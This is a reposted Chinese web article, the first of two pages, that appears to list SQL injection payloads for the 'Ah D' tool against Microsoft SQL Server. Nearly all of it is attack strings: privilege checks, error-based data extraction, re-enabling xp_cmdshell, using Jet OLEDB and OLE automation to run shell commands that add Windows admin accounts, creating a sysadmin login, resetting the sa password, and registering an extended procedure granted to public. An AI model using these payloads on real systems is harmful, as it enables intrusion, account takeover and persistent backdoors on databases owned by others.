当前位置:七道奇文章资讯安全技术网络技术
日期:2009-08-07 16:08:00  来源:本站整理

啊D的注入号令[网络技术]

赞助商链接



  本文“啊D的注入号令[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

//看看是什么权限的  
and 1=(Select IS_MEMBER(’db_owner’))  
And char(124)%2BCast(IS_MEMBER(’db_owner’) as varchar(1))%2Bchar(124)=1 ;--  

//检测能否有读取某数据库的权限  
and 1= (Select HAS_DBACCESS(’master’))  
And char(124)%2BCast(HAS_DBACCESS(’master’) as varchar(1))%2Bchar(124)=1 --  


数字范例  
and char(124)%2Buser%2Bchar(124)=0  

字符范例  
’ and char(124)%2Buser%2Bchar(124)=0 and ’’=’  

搜索范例  
’ and char(124)%2Buser%2Bchar(124)=0 and ’%’=’  

爆用户名  
and user>0  
’ and user>0 and ’’=’  

检测能否为SA权限  
and 1=(select IS_SRVROLEMEMBER(’sysadmin’));--  
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --  

检测是不是MSSQL数据库  
and exists (select * from sysobjects);--    

检测能否支持多行  
;declare @d int;--    

恢复 xp_cmdshell  
;exec master..dbo.sp_addextendedproc ’xp_cmdshell’,’xplog70.dll’;--  


select * from openrowset(’sqloledb’,’server=192.168.1.200,1433;uid=test;pwd=pafpaf’,’select @@version’)    

//-----------------------  
//      履行号令  
//-----------------------  
首先开启沙盘情势:  
exec master..xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1  

然后操纵jet.oledb履行系统号令  
select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=c:\winnt\system32\ias\ias.mdb’,’select shell("cmd.exe /c net user admin admin1234 /add")’)  

履行号令  
;DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ’C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add’;--  

EXEC [master].[dbo].[xp_cmdshell] ’cmd /c md c:\1111’  

判断xp_cmdshell扩大存储历程能否存在:  
http://192.168.1.5/display... and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = ’X’ AND name = ’xp_cmdshell’)  

写注册表  
exec master..xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1  

REG_SZ  

读注册表  
exec master..xp_regread ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon’,’Userinit’  

读取目录内容  
exec master..xp_dirtree ’c:\winnt\system32\’,1,1  


数据库备份  
backup database pubs to disk = ’c:\123.bak’  

//爆出长度  
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--  

   

更改sa口令办法:用sql综合操纵工具衔接后,履行号令:  
exec sp_password NULL,’新密码’,’sa’  

增添和删除一个SA权限的用户test:  
exec master.dbo.sp_addlogin test,ptlove  
exec master.dbo.sp_addsrvrolemember test,sysadmin  

删除扩大存储过历程xp_cmdshell的语句:    
exec sp_dropextendedproc ’xp_cmdshell’  

增添扩大存储过历程  
EXEC [master]..sp_addextendedproc ’xp_proxiedadata’, ’c:\winnt\system32\sqllog.dll’    
GRANT exec On xp_proxiedadata TO public    


停掉或激活某个服务.    

exec master..xp_servicecontrol ’stop’,’schedule’  
exec master..xp_servicecontrol ’start’,’schedule’  

dbo.xp_subdirs  

只列某个目录下的子目录.  
xp_getfiledetails ’C:\Inetpub\wwwroot\SQLInject\login.asp’  

dbo.xp_makecab  

将目标多个档案紧缩到某个目标档案之内.  
全部要紧缩的档案都可以接在参数列的最后方,以逗号离隔.  

dbo.xp_makecab  

[1] [2]  下一页


  以上是“啊D的注入号令[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • 啊D的注入号令
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .